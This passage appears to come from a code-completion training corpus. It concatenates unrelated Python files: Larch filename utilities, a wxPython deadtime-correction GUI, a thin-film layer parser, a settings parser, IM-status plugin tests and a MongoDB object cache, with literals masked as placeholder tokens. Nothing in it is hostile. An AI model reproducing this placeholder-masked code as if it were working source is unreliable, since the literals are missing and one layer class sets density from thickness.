'<STR_LIT:_>' in base : <EOL> parts = base . split ( '<STR_LIT:_>' ) <EOL> for iw , word in enumerate ( parts [ : : - <NUM_LIT:1> ] ) : <EOL> if word . isdigit ( ) : <EOL> parts [ len ( parts ) - iw - <NUM_LIT:1> ] = form % ( int ( word ) + <NUM_LIT:1> ) <EOL> found = True <EOL> break <EOL> base = '<STR_LIT:_>' . 
join ( parts ) <EOL> if not found and '<STR_LIT:.>' in base : <EOL> parts = base . split ( '<STR_LIT:.>' ) <EOL> for iw , word in enumerate ( parts [ : : - <NUM_LIT:1> ] ) : <EOL> if word . isdigit ( ) : <EOL> parts [ len ( parts ) - iw - <NUM_LIT:1> ] = form % ( int ( word ) + <NUM_LIT:1> ) <EOL> found = True <EOL> break <EOL> base = '<STR_LIT:.>' . join ( parts ) <EOL> if not found : <EOL> base = "<STR_LIT>" % base <EOL> return ( base , ext ) <EOL> base , ext = _incr ( base , ext ) <EOL> fout = pathOf ( dirname , base , ext , delim = delim ) <EOL> while ( os . path . exists ( fout ) ) : <EOL> base , ext = _incr ( base , ext ) <EOL> fout = pathOf ( dirname , base , ext , delim = delim ) <EOL> return fout <EOL> def new_filename ( fname = None , ndigits = <NUM_LIT:3> ) : <EOL> """<STR_LIT>""" <EOL> if fname is None : <EOL> ext = ( "<STR_LIT>" % ndigits ) % <NUM_LIT:1> <EOL> fname = "<STR_LIT>" % ( random_string ( <NUM_LIT:6> ) , ext ) <EOL> if os . path . exists ( fname ) : <EOL> fname = increment_filename ( fname , ndigits = ndigits ) <EOL> return fname <EOL> def new_dirname ( dirname = None , ndigits = <NUM_LIT:3> ) : <EOL> """<STR_LIT>""" <EOL> if dirname is None : <EOL> ext = ( "<STR_LIT>" % ndigits ) % <NUM_LIT:1> <EOL> dirname = "<STR_LIT>" % ( random_string ( <NUM_LIT:6> ) , ext ) <EOL> dirname = dirname . replace ( '<STR_LIT:.>' , '<STR_LIT:_>' ) <EOL> if os . path . 
exists ( dirname ) : <EOL> dirname = increment_filename ( dirname , ndigits = ndigits , delim = '<STR_LIT:_>' ) <EOL> return dirname <EOL> def test_incrementfilename ( ) : <EOL> tests = ( ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , <EOL> '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> npass = nfail = <NUM_LIT:0> <EOL> for inp , out in tests : <EOL> tval = increment_filename ( inp ) <EOL> if tval != out : <EOL> print ( "<STR_LIT>" , inp ) <EOL> print ( "<STR_LIT>" % ( tval , out ) ) <EOL> nfail = nfail + <NUM_LIT:1> <EOL> else : <EOL> npass = npass + <NUM_LIT:1> <EOL> print ( '<STR_LIT>' % ( npass , npass + nfail ) ) <EOL> def initializeLarchPlugin ( _larch = None ) : <EOL> """<STR_LIT>""" <EOL> if _larch is not None : <EOL> mod = getattr ( _larch . symtable , '<STR_LIT>' ) <EOL> mod . __doc__ = MODDOC <EOL> def registerLarchPlugin ( ) : <EOL> return ( '<STR_LIT>' , { '<STR_LIT>' : increment_filename , <EOL> '<STR_LIT>' : new_filename , <EOL> '<STR_LIT>' : new_dirname , <EOL> '<STR_LIT>' : fix_filename , <EOL> '<STR_LIT>' : fix_varname , <EOL> '<STR_LIT>' : pathOf , <EOL> '<STR_LIT>' : unixpath , <EOL> '<STR_LIT>' : winpath , <EOL> '<STR_LIT>' : nativepath , <EOL> '<STR_LIT>' : strip_quotes , <EOL> '<STR_LIT>' : get_timestamp , <EOL> '<STR_LIT>' : asciikeys } ) </s>
"""wxPython GUI for applying deadtime corrections to GSE scan files."""
import os
import time
import shutil
import numpy as np
from random import randrange
from functools import partial
from datetime import timedelta

import wx
import wx.lib.agw.flatnotebook as flat_nb
import wx.lib.scrolledpanel as scrolled
import wx.lib.mixins.inspection

# Epics support is optional; the GUI works without it.
HAS_EPICS = False
try:
    import epics
    from epics.wx import DelayedEpicsCallback, EpicsFunction
    HAS_EPICS = True
except ImportError:
    pass

from larch import Interpreter
from larch.larchlib import read_workdir, save_workdir
from larch_plugins.io import (gsescan_deadtime_correct, gsexdi_deadtime_correct,
                              is_GSEXDI)
from wxutils import (SimpleText, FloatCtrl, pack, Button, Popup,
                     Choice, Check, MenuItem, GUIColors,
                     CEN, RCEN, LCEN, FRAMESTYLE, Font)

CEN |= wx.ALL
FILE_WILDCARDS = "<STR_LIT>"
FNB_STYLE = flat_nb.FNB_NO_X_BUTTON | flat_nb.FNB_SMART_TABS | flat_nb.FNB_NO_NAV_BUTTONS
WORKDIR_FILE = '<STR_LIT>'


def okcancel(panel, onOK=None, onCancel=None):
    # Build a standard OK/Cancel button row bound to the given callbacks.
    btnsizer = wx.StdDialogButtonSizer()
    _ok = wx.Button(panel, wx.ID_OK)
    _no = wx.Button(panel, wx.ID_CANCEL)
    panel.Bind(wx.EVT_BUTTON, onOK, _ok)
    panel.Bind(wx.EVT_BUTTON, onCancel, _no)
    _ok.SetDefault()
    btnsizer.AddButton(_ok)
    btnsizer.AddButton(_no)
    btnsizer.Realize()
    return btnsizer


class DTCorrectFrame(wx.Frame):
    """Main window: choose an ROI, output directory, bad channels, then pick
    scan files to run deadtime correction on."""
    _about = """<STR_LIT>"""

    def __init__(self, _larch=None, **kws):
        wx.Frame.__init__(self, None, -<NUM_LIT:1>, style=FRAMESTYLE)
        self.file_groups = {}
        self.file_paths = []
        title = "<STR_LIT>"
        # Larch interpreter may be supplied by the caller; otherwise it is
        # created lazily in init_larch (via wx.CallAfter).
        self.larch = _larch
        self.subframes = {}
        self.SetMinSize((<NUM_LIT>, <NUM_LIT>))
        self.SetFont(Font(<NUM_LIT:10>))
        self.config = {'<STR_LIT>': True}
        self.SetTitle(title)
        self.createMainPanel()
        self.createMenus()
        self.statusbar = self.CreateStatusBar(<NUM_LIT:2>, <NUM_LIT:0>)
        self.statusbar.SetStatusWidths([-<NUM_LIT:3>, -<NUM_LIT:1>])
        statusbar_fields = ["<STR_LIT>", "<STR_LIT:U+0020>"]
        for i in range(len(statusbar_fields)):
            self.statusbar.SetStatusText(statusbar_fields[i], i)
        # Restore the previously saved working directory.
        read_workdir(WORKDIR_FILE)

    def onBrowse(self, event=None):
        # Select one or more data files and run the deadtime correction on
        # each, writing results into the chosen output subdirectory.
        dlg = wx.FileDialog(parent=self,
                            message='<STR_LIT>',
                            defaultDir=os.getcwd(),
                            wildcard=FILE_WILDCARDS,
                            style=wx.FD_OPEN | wx.FD_MULTIPLE | wx.FD_CHANGE_DIR)
        if dlg.ShowModal() == wx.ID_OK:
            path = dlg.GetPath()
            mdir, p = os.path.split(path)
            # chdir so GetFilenames() (bare names) resolve correctly.
            os.chdir(mdir)
            roiname = self.roi_wid.GetValue().strip()
            if len(roiname) < <NUM_LIT:1>:
                # An ROI name is mandatory.
                Popup(self,
                      '<STR_LIT>', '<STR_LIT>')
                return
            dirname = self.dir_wid.GetValue().strip()
            if len(dirname) > <NUM_LIT:1> and not os.path.exists(dirname):
                try:
                    os.mkdir(dirname)
                except:
                    # Directory creation failed (permissions, bad name, ...).
                    Popup(self,
                          '<STR_LIT>' % dirname,
                          "<STR_LIT>")
                    return
            badchans = self.badchans_wid.GetValue().strip()
            bad_channels = []
            if len(badchans) > <NUM_LIT:0>:
                # Comma-separated list of detector channels to exclude.
                bad_channels = [int(i.strip()) for i in badchans.split('<STR_LIT:U+002C>')]
                print('<STR_LIT>', bad_channels)
            for fname in dlg.GetFilenames():
                # XDI-format files use a different correction routine.
                corr_fcn = gsescan_deadtime_correct
                if is_GSEXDI(fname):
                    corr_fcn = gsexdi_deadtime_correct
                corr_fcn(fname, roiname, subdir=dirname, bad=bad_channels,
                         _larch=self.larch)

    def createMainPanel(self):
        # Simple 2-column form: ROI name, output dir, bad channels, browse.
        panel = wx.Panel(self)
        sizer = wx.GridBagSizer(<NUM_LIT:5>, <NUM_LIT:4>)
        lab_roi = SimpleText(panel, '<STR_LIT>')
        lab_out = SimpleText(panel, '<STR_LIT>')
        lab_bad = SimpleText(panel, '<STR_LIT>')
        lab_sel = SimpleText(panel, '<STR_LIT>')
        self.roi_wid = wx.TextCtrl(panel, -<NUM_LIT:1>, '<STR_LIT>', size=(<NUM_LIT:200>, -<NUM_LIT:1>))
        self.dir_wid = wx.TextCtrl(panel, -<NUM_LIT:1>, '<STR_LIT>', size=(<NUM_LIT:200>, -<NUM_LIT:1>))
        self.badchans_wid = wx.TextCtrl(panel, -<NUM_LIT:1>, '<STR_LIT:U+0020>', size=(<NUM_LIT:200>, -<NUM_LIT:1>))
        self.sel_wid = Button(panel, '<STR_LIT>', size=(<NUM_LIT:100>, -<NUM_LIT:1>),
                              action=self.onBrowse)
        ir = <NUM_LIT:0>
        sizer.Add(lab_roi, (ir, <NUM_LIT:0>), (<NUM_LIT:1>, <NUM_LIT:1>), LCEN, <NUM_LIT:2>)
        sizer.Add(self.roi_wid, (ir, <NUM_LIT:1>), (<NUM_LIT:1>, <NUM_LIT:1>), LCEN, <NUM_LIT:2>)
        ir += <NUM_LIT:1>
        sizer.Add(lab_out, (ir, <NUM_LIT:0>), (<NUM_LIT:1>, <NUM_LIT:1>), LCEN, <NUM_LIT:2>)
        sizer.Add(self.dir_wid, (ir, <NUM_LIT:1>), (<NUM_LIT:1>, <NUM_LIT:1>), LCEN, <NUM_LIT:2>)
        ir += <NUM_LIT:1>
        sizer.Add(lab_bad, (ir, <NUM_LIT:0>), (<NUM_LIT:1>, <NUM_LIT:1>), LCEN, <NUM_LIT:2>)
        sizer.Add(self.badchans_wid, (ir, <NUM_LIT:1>), (<NUM_LIT:1>, <NUM_LIT:1>), LCEN, <NUM_LIT:2>)
        ir += <NUM_LIT:1>
        sizer.Add(lab_sel, (ir, <NUM_LIT:0>), (<NUM_LIT:1>, <NUM_LIT:1>), LCEN, <NUM_LIT:2>)
        sizer.Add(self.sel_wid, (ir, <NUM_LIT:1>), (<NUM_LIT:1>, <NUM_LIT:1>), LCEN, <NUM_LIT:2>)
        pack(panel, sizer)
        # Defer interpreter creation until after the window is shown.
        wx.CallAfter(self.init_larch)
        return

    def init_larch(self):
        # Create the larch interpreter on demand and register GUI symbols.
        t0 = time.time()
        if self.larch is None:
            self.larch = Interpreter()
        self.larch.symtable.set_symbol('<STR_LIT>', wx.GetApp())
        self.larch.symtable.set_symbol('<STR_LIT>', self)
        self.SetStatusText('<STR_LIT>')

    def write_message(self, s, panel=<NUM_LIT:0>):
        """Write message *s* to status-bar field *panel*."""
        self.SetStatusText(s, panel)

    def createMenus(self):
        # Minimal menu bar: a single File menu with an exit item.
        self.menubar = wx.MenuBar()
        fmenu = wx.Menu()
        MenuItem(self, fmenu, "<STR_LIT>", "<STR_LIT>", self.onClose)
        self.menubar.Append(fmenu, "<STR_LIT>")
        self.SetMenuBar(self.menubar)

    def onClose(self, evt):
        # Persist the working directory before tearing the frame down.
        save_workdir(WORKDIR_FILE)
        self.Destroy()


class DTViewer(wx.App, wx.lib.mixins.inspection.InspectionMixin):
    """wx.App wrapper that shows a DTCorrectFrame as the top window."""

    def __init__(self, _larch=None, **kws):
        self._larch = _larch
        wx.App.__init__(self, **kws)

    def run(self):
        self.MainLoop()

    def createApp(self):
        frame = DTCorrectFrame(_larch=self._larch)
        frame.Show()
        self.SetTopWindow(frame)

    def OnInit(self):
        self.createApp()
        return True


def _dtcorrect(wxparent=None, _larch=None, **kws):
    # Larch-plugin entry point: open the correction frame and raise it.
    s = DTCorrectFrame(_larch=_larch, **kws)
    s.Show()
    s.Raise()


def registerLarchPlugin():
    return ('<STR_LIT>', {'<STR_LIT>': _dtcorrect})


if __name__ == '<STR_LIT:__main__>':
    x = DTViewer()
    x.run()
<s> from . chemparser import chemparse <EOL> from . physical_constants import ( R_ELECTRON_CM , AVOGADRO , BARN , <EOL> PLANCK_HC , RAD2DEG ) <EOL> from . xraydb import xrayDB <EOL> from . xraydb_plugin import ( atomic_mass , atomic_number , <EOL> atomic_symbol , atomic_density , <EOL> xray_line , xray_lines , xray_edge , <EOL> xray_edges , f0 , f0_ions , mu_elam , <EOL> mu_chantler , f1_chantler , f2_chantler , <EOL> core_width , chantler_data ) <EOL> from . materials import material_mu , material_get <EOL> from . cromer_liberman import f1f2 </s>
"""Model of a multilayer thin-film structure parsed from a compact
'A/B(t)/[C/D]xN/...' sequence string."""


def letters_between(text, strl, strr):
    """Return (substring, left_index, right_index) tuples for every span of
    *text* delimited by the marker characters *strl* ... *strr*."""
    mid = '<STR_LIT>'
    out = []
    left = None
    for ii, letter in enumerate(text):
        if letter == strl:
            left = ii
            # Special case: an opening marker within the final 2-3 characters
            # is taken to run to the end of the string.
            # NOTE(review): the original flattened source is ambiguous about
            # this nesting -- confirm against the upstream file.
            if (left == len(text) - <NUM_LIT:2>) or (left == len(text) - <NUM_LIT:3>):
                mid = text[left + <NUM_LIT:1>:]
                out.append((mid, left, len(text) - <NUM_LIT:1>))
                left = None
        if left is not None and letter == strr:
            mid = text[left + <NUM_LIT:1>:ii]
            out.append((mid, left, ii))
            left = None
    return out


class FilmLayer:
    """One layer of a film: composition plus physical parameters."""

    def __init__(self, composition='<STR_LIT>', density=<NUM_LIT:1>, thickness=<NUM_LIT:1>,
                 roughness=<NUM_LIT:1>, tag='<STR_LIT>'):
        self.tag = tag
        self.composition = composition
        self.density = density
        # NOTE(review): relden is initialized from *thickness*, not density --
        # looks like a possible copy/paste bug; confirm intended semantics.
        self.relden = thickness
        self.thickness = thickness
        self.roughness = roughness


class Film:
    """A film stack built by parsing a compact layer-sequence string."""

    def __init__(self, film_structure='<STR_LIT>'):
        self.film_structure = film_structure
        self.layer_sequence = film_structure
        self.layers = []

    def get_structure(self):
        # Expand any [..]xN repeats, then split the '/'-separated sequence
        # into individual FilmLayer entries.
        self.layer_sequence = self.expand_sequence(self.film_structure)
        for layer in self.layer_sequence.split('<STR_LIT:/>'):
            tag = '<STR_LIT>'
            # 'Material(thickness)' -> split on '(' and strip trailing ')'.
            words = layer.split('<STR_LIT:(>')
            material = words[<NUM_LIT:0>]
            if len(words) == <NUM_LIT:1>:
                tag, thickness = '<STR_LIT>', '<STR_LIT>'
            else:
                tag, thickness = '<STR_LIT>', words[<NUM_LIT:1>][:-<NUM_LIT:1>]
            self.layers.append(FilmLayer(composition=material,
                                         thickness=thickness, tag=tag))
        # Always terminate the stack with a substrate layer.
        self.layers.append(FilmLayer(composition='<STR_LIT>', density=<NUM_LIT>,
                                     thickness=<NUM_LIT:0>, tag='<STR_LIT>'))

    def reverse_structure(self):
        # Flip the stacking order in place.
        self.layers.reverse()

    def expand_sequence(self, sequence):
        """Expand '[...]xN' repeat groups in *sequence* into explicit
        '/'-separated repetitions and return the expanded string."""
        fullname = sequence[:]
        repeats = letters_between(fullname, '<STR_LIT:[>', '<STR_LIT:]>')
        factors = letters_between(fullname, '<STR_LIT:x>', '<STR_LIT:/>')
        # Expand one repeat group per pass, re-scanning after each expansion.
        for nn in range(len(repeats)):
            repeats = letters_between(fullname, '<STR_LIT:[>', '<STR_LIT:]>')
            factors = letters_between(fullname, '<STR_LIT:x>', '<STR_LIT:/>')
            (text1, posL1, posR1) = repeats[<NUM_LIT:0>]
            (num2, posL2, posR2) = factors[<NUM_LIT:0>]
            pre = fullname[:posL1]
            center = '<STR_LIT>'
            for ix in range(<NUM_LIT:0>, int(num2)):
                center = center + text1 + '<STR_LIT:/>'
            post = fullname[posR2 + <NUM_LIT:1>:]
            if post == '<STR_LIT>':
                # Drop the trailing '/' when the repeat ends the sequence.
                center = center[:-<NUM_LIT:1>]
            fullname = pre + center + post
        return fullname


def test(structure):
    # Parse *structure* and print the resulting layer stack.
    film = Film(structure)
    film.get_structure()
    print('<STR_LIT>', film.film_structure)
    for item in film.layers:
        print(item.composition, item.thickness, item.density, item.roughness, item.tag)


def testall():
    test('<STR_LIT>')
    test('<STR_LIT>')
    test('<STR_LIT>')
    test('<STR_LIT>')


if __name__ == '<STR_LIT:__main__>':
    testall()
"""Parser package facade: validates a settings file against its expected
header line."""
from focus import common
from focus.parser.lexer import SettingLexer
from focus.parser.parser import SettingParser, ParseError

__all__ = ('<STR_LIT>', '<STR_LIT>', '<STR_LIT>', '<STR_LIT>')


def parse_config(filename, header):
    """Parse *filename* and check that its header matches *header*.

    Returns the ``SettingParser`` on success; raises ``ParseError`` when the
    parsed header differs from the expected one.
    """
    parser = SettingParser(filename)
    if parser.header == header:
        return parser
    # Mismatch: report the header actually found (falling back to a
    # placeholder when the file carried none) next to the expected one.
    found = parser.header or '<STR_LIT>'
    raise ParseError(u"<STR_LIT>"
                     .format(common.from_utf8(found), header))
from focus.plugin.modules import im as plugins
from focus_unittest import (
    FocusTestCase, IS_MACOSX, skipUnless, skipIf
)


class IMStatusCase(FocusTestCase):
    """Tests for the IMStatus plugin: option parsing and status fan-out."""

    def setUp(self):
        super(IMStatusCase, self).setUp()
        self.plugin = plugins.IMStatus()

    def tearDown(self):
        # Drop the plugin reference so each test gets a fresh instance.
        self.plugin = None
        super(IMStatusCase, self).tearDown()

    def testValidStatusType__parse_option(self):
        """parse_option accepts every valid status for each status-type key
        and records it (with message token) under the normalized key."""
        self.assertEqual(self.plugin.statuses, {})
        for status in self.plugin.VALID_STATUSES:
            for key in ('<STR_LIT:status>', '<STR_LIT>', '<STR_LIT>'):
                self.plugin.parse_option(key, '<STR_LIT>',
                                         status, '<STR_LIT>')
                # Keys are normalized: bare 'status' is prefixed, then the
                # portion before the first '_' is used as the lookup key.
                if key == '<STR_LIT:status>':
                    key = '<STR_LIT>' + key
                key = key.split('<STR_LIT:_>', <NUM_LIT:1>)[<NUM_LIT:0>]
                self.assertIn(key, self.plugin.statuses)
                self.assertEqual(self.plugin.statuses[key], (status, '<STR_LIT>'))

    def testValidStatusMsg__parse_option(self):
        """parse_option stores status messages keyed by message name."""
        self.assertEqual(self.plugin.messages, {})
        for key in ('<STR_LIT>', '<STR_LIT>', '<STR_LIT>'):
            value = '<STR_LIT>'
            self.plugin.parse_option('<STR_LIT>', '<STR_LIT>',
                                     key, value)
            self.assertIn(key, self.plugin.messages)
            self.assertEqual(self.plugin.messages[key], value)

    def testInvalidStatusType__parse_option(self):
        """Wrong arity raises TypeError; an unknown status raises ValueError."""
        for key in ('<STR_LIT:status>', '<STR_LIT>', '<STR_LIT>'):
            with self.assertRaises(TypeError):
                self.plugin.parse_option(key, '<STR_LIT>',
                                         '<STR_LIT>', '<STR_LIT:2>', '<STR_LIT:3>', '<STR_LIT:4>')
            with self.assertRaises(ValueError):
                self.plugin.parse_option(key, '<STR_LIT>',
                                         '<STR_LIT>')

    def testInvalidStatusMsg__parse_option(self):
        """Too many values for a message option raises TypeError."""
        with self.assertRaises(TypeError):
            self.plugin.parse_option('<STR_LIT>', '<STR_LIT>',
                                     '<STR_LIT:name>', '<STR_LIT:value>', '<STR_LIT:2>', '<STR_LIT:3>')

    @skipUnless(IS_MACOSX, '<STR_LIT>')
    def testMac___set_status(self):
        """On macOS the plugin targets the Adium and OSX-Skype setters."""
        self.assertEquals(self.plugin.set_status_funcs, (
            plugins._adium_status, plugins._osx_skype_status
        ))

    @skipIf(IS_MACOSX, '<STR_LIT>')
    def testRegular___set_status(self):
        """On non-mac platforms the plugin targets the Linux IM setters."""
        self.assertEquals(self.plugin.set_status_funcs, (
            plugins._pidgin_status, plugins._empathy_status,
            plugins._linux_skype_status
        ))

    def testCallStatusFuncs___set_status(self):
        """_set_status fans the (status, message) pair out to every
        registered setter function."""
        ret_items = []

        def _check_func(status, message):
            ret_items.append((status, message))

        self.plugin.set_status_funcs = (_check_func, _check_func)
        self.plugin._set_status('<STR_LIT>', '<STR_LIT>')
        for item in ret_items:
            self.assertEqual(item, ('<STR_LIT>', '<STR_LIT>'))
<s> """<STR_LIT>""" <EOL> from pymongo import MongoClient <EOL> import logging <EOL> import base <EOL> import constants as cons <EOL> from bson . objectid import ObjectId <EOL> from uid import UID <EOL> logger = logging . getLogger ( "<STR_LIT>" ) <EOL> class MongoClientPool ( object ) : <EOL> def __init__ ( self ) : <EOL> self . __clients = { } <EOL> def getDataBase ( self , connectionString , databaseName ) : <EOL> key = ( connectionString , databaseName ) <EOL> if key in self . __clients : <EOL> return self . __clients [ key ] [ databaseName ] <EOL> else : <EOL> try : <EOL> client = MongoClient ( connectionString , connectTimeoutMS = <NUM_LIT> ) <EOL> self . __clients [ key ] = client <EOL> return client [ databaseName ] <EOL> except Exception as e : <EOL> logger . warning ( e . message ) <EOL> logger . warning ( '<STR_LIT>' . format ( databaseName , connectionString ) ) <EOL> return None <EOL> def getClient ( self , connectionString ) : <EOL> if connectionString in self . __clients : <EOL> return self . __clients [ connectionString ] <EOL> else : <EOL> try : <EOL> client = MongoClient ( connectionString , connectTimeoutMS = <NUM_LIT> ) <EOL> self . __clients [ connectionString ] = client <EOL> return client <EOL> except Exception as e : <EOL> logger . warning ( e . message ) <EOL> logger . warning ( '<STR_LIT>' . format ( connectionString ) ) <EOL> return None <EOL> def exists ( self ) : <EOL> [ client . close ( ) for client in self . __clients . values ( ) ] <EOL> class Crane ( object ) : <EOL> mongoClientPool = MongoClientPool ( ) <EOL> def __init__ ( self , connectionString = None , database = None , collectionName = None ) : <EOL> if connectionString is None or database is None or collectionName is None : <EOL> return <EOL> logger . info ( '<STR_LIT>' . format ( collectionName ) ) <EOL> self . _defaultCollectionName = collectionName <EOL> self . _currentCollectionName = collectionName <EOL> self . _database = self . mongoClientPool . 
getDataBase ( connectionString , database ) <EOL> self . _coll = self . _database [ collectionName ] <EOL> self . _cache = { } <EOL> def __get_one ( self , key ) : <EOL> if key in self . _cache : <EOL> return self . _cache [ key ] <EOL> else : <EOL> return None <EOL> def __get_all ( self , keys ) : <EOL> objs = [ self . _cache [ key ] for key in keys if key in self . _cache ] <EOL> rems = [ key for key in keys if key not in self . _cache ] <EOL> return objs , rems <EOL> def __put_one ( self , obj ) : <EOL> self . _cache [ obj . _id ] = obj <EOL> def __put_all ( self , objs ) : <EOL> map ( self . __put_one , objs ) <EOL> def __erase_one ( self , obj ) : <EOL> try : <EOL> del self . _cache [ obj . _id ] <EOL> except : <EOL> pass <EOL> def __erase_all ( self , objs ) : <EOL> map ( self . __erase_one , objs ) <EOL> def _reload ( self ) : <EOL> for key in self . _cache : <EOL> self . _cache [ key ] = base . monkFactory . decode ( self . _cache [ key ] . generic ( ) ) <EOL> def set_collection_name ( self , collectionName ) : <EOL> if collectionName : <EOL> self . _coll = self . _database [ collectionName ] <EOL> self . _currentCollectionName = collectionName <EOL> def reset_collection_name ( self ) : <EOL> self . _coll = self . _database [ self . _defaultCollectionName ] <EOL> self . _currentCollectionName = self . _defaultCollectionName <EOL> def convert_to_MONKObject ( self , monkType ) : <EOL> objs = self . _coll . find ( ) <EOL> rets = [ ] <EOL> for obj in objs : <EOL> obj [ '<STR_LIT>' ] = monkType <EOL> obj = self . create_one ( obj ) <EOL> rets . append ( obj ) <EOL> self . save_all ( rets ) <EOL> return rets <EOL> def delete_by_id ( self , obj ) : <EOL> if not obj : <EOL> return False <EOL> if not isinstance ( obj , ObjectId ) : <EOL> return False <EOL> self . _coll . remove ( obj ) <EOL> self . 
__erase_one ( obj ) <EOL> return True <EOL> def load_or_create ( self , obj , tosave = False ) : <EOL> if obj is None : <EOL> return None <EOL> if isinstance ( obj , ObjectId ) : <EOL> return self . load_one_by_id ( obj ) <EOL> else : <EOL> objId = self . load_one_in_id ( { '<STR_LIT:name>' : obj . get ( '<STR_LIT:name>' , cons . DEFAULT_EMPTY ) , <EOL> '<STR_LIT>' : obj . get ( '<STR_LIT>' , cons . DEFAULT_CREATOR ) } ) <EOL> if objId : <EOL> return self . load_one_by_id ( objId [ '<STR_LIT>' ] ) <EOL> elif '<STR_LIT>' in obj : <EOL> obj = self . create_one ( obj ) <EOL> if tosave : <EOL> obj . save ( ) <EOL> return obj <EOL> else : <EOL> return None <EOL> def load_or_create_all ( self , objs , tosave = False ) : <EOL> if not objs : <EOL> return [ ] <EOL> if isinstance ( objs [ <NUM_LIT:0> ] , ObjectId ) : <EOL> return self . load_all_by_ids ( objs ) <EOL> else : <EOL> return [ self . load_or_create ( obj , tosave ) for obj in objs ] <EOL> def exists_field ( self , obj , field ) : <EOL> query = { '<STR_LIT>' : obj . _id , field : { '<STR_LIT>' : True } } <EOL> if self . _coll . find_one ( query , { '<STR_LIT>' : <NUM_LIT:1> } ) : <EOL> return True <EOL> else : <EOL> return False <EOL> def exists_fields ( self , obj , fields ) : <EOL> query = { field : { '<STR_LIT>' : True } for field in fields } <EOL> query [ '<STR_LIT>' ] = obj . _id <EOL> if self . _coll . find_one ( query , { '<STR_LIT>' : <NUM_LIT:1> } ) : <EOL> return True <EOL> else : <EOL> return False <EOL> def remove_field ( self , obj , field ) : <EOL> try : <EOL> self . _coll . update ( { '<STR_LIT>' : obj . _id } , { '<STR_LIT>' : { field : <NUM_LIT:1> } } ) <EOL> except Exception as e : <EOL> logger . warning ( e . message ) <EOL> logger . warning ( '<STR_LIT>' . format ( field , obj . _id ) ) <EOL> return False <EOL> return True <EOL> def remove_fields ( self , obj , fields ) : <EOL> try : <EOL> self . _coll . update ( { '<STR_LIT>' : obj . 
_id } , { '<STR_LIT>' : fields } ) <EOL> except Exception as e : <EOL> logger . warning ( e . message ) <EOL> logger . warning ( '<STR_LIT>' . format ( '<STR_LIT>' . join ( fields ) , obj . _id ) ) <EOL> return False <EOL> return True <EOL> def push_one_in_fields ( self , obj , fields ) : <EOL> try : <EOL> self . _coll . update ( { '<STR_LIT>' : obj . _id } , { '<STR_LIT>' : fields } ) <EOL> except Exception as e : <EOL> logger . warning ( e . message ) <EOL> logger . warning ( '<STR_LIT>' . format ( obj . _id , fields ) ) <EOL> return False <EOL> return True <EOL> def pull_one_in_fields ( self , obj , fields ) : <EOL> try : <EOL> self . _coll . update ( { '<STR_LIT>' : obj . _id } , { '<STR_LIT>' : fields } ) <EOL> except Exception as e : <EOL> logger . warning ( e . message ) <EOL> logger . warning ( '<STR_LIT>' . format ( fields , obj . _id ) ) <EOL> return False <EOL> return True <EOL> def update_in_fields ( self , query , fields ) : <EOL> obj = self . load_one_in_id ( query ) <EOL> try : <EOL> self . _coll . update ( { '<STR_LIT>' : obj [ '<STR_LIT>' ] } , { '<STR_LIT>' : fields } , upsert = True ) <EOL> except Exception as e : <EOL> logger . warning ( e . message ) <EOL> logger . warning ( '<STR_LIT>' . format ( obj , fields ) ) <EOL> return False <EOL> return True <EOL> def update_one_in_fields ( self , obj , fields ) : <EOL> try : <EOL> self . _coll . update ( { '<STR_LIT>' : obj . _id } , { '<STR_LIT>' : fields } , upsert = True ) <EOL> except Exception as e : <EOL> logger . warning ( e . message ) <EOL> logger . warning ( '<STR_LIT>' . format ( obj . _id , fields ) ) <EOL> return False <EOL> return True <EOL> def load_one_in_fields ( self , obj , fields ) : <EOL> try : <EOL> return self . _coll . find_one ( { '<STR_LIT>' : obj . _id } , fields ) <EOL> except Exception as e : <EOL> logger . warning ( e . message ) <EOL> logger . warning ( '<STR_LIT>' . format ( obj . _id , fields ) ) <EOL> return None <EOL> def save_one ( self , obj ) : <EOL> self . 
update_one_in_fields ( obj , obj . generic ( ) ) <EOL> def save_all ( self , objs ) : <EOL> [ self . update_one_in_fields ( obj , obj . generic ( ) ) for obj in objs ] <EOL> def create_one ( self , obj ) : <EOL> obj = base . monkFactory . decode ( obj ) <EOL> if obj : <EOL> self . __put_one ( obj ) <EOL> return obj <EOL> def create_all ( self , objs ) : <EOL> objs = map ( base . monkFactory . decode , objs ) <EOL> self . __put_all ( objs ) <EOL> return objs <EOL> def load_one_by_id ( self , objId ) : <EOL> obj = self . __get_one ( objId ) <EOL> if not obj and objId : <EOL> try : <EOL> obj = self . _coll . find_one ( { '<STR_LIT>' : objId } ) <EOL> obj = base . monkFactory . decode ( obj ) <EOL> if obj : <EOL> self . __put_one ( obj ) <EOL> except Exception as e : <EOL> logger . warning ( e . message ) <EOL> logger . warning ( '<STR_LIT>' . format ( objId ) ) <EOL> obj = None <EOL> return obj <EOL> def load_all_by_ids ( self , objIds ) : <EOL> objs , rems = self . __get_all ( objIds ) <EOL> if rems : <EOL> try : <EOL> remainObjs = map ( base . monkFactory . decode , <EOL> self . _coll . find ( { '<STR_LIT>' : { '<STR_LIT>' : rems } } ) ) <EOL> except Exception as e : <EOL> logger . warning ( e . message ) <EOL> logger . warning ( '<STR_LIT>' . format ( rems [ <NUM_LIT:0> ] ) ) <EOL> remainObjs = [ ] <EOL> objs . extend ( remainObjs ) <EOL> self . __put_all ( remainObjs ) <EOL> return objs <EOL> def load_one_in_id ( self , query ) : <EOL> try : <EOL> return self . _coll . find_one ( query , { '<STR_LIT>' : <NUM_LIT:1> } ) <EOL> except Exception as e : <EOL> logger . warning ( e . message ) <EOL> logger . warning ( '<STR_LIT>' . format ( query ) ) <EOL> return None <EOL> def load_all_in_ids ( self , query , skip = <NUM_LIT:0> , num = <NUM_LIT:0> ) : <EOL> try : <EOL> return list ( self . _coll . find ( query , { '<STR_LIT>' : <NUM_LIT:1> } , skip = skip , limit = num ) ) <EOL> except Exception as e : <EOL> logger . warning ( e . message ) <EOL> logger . 
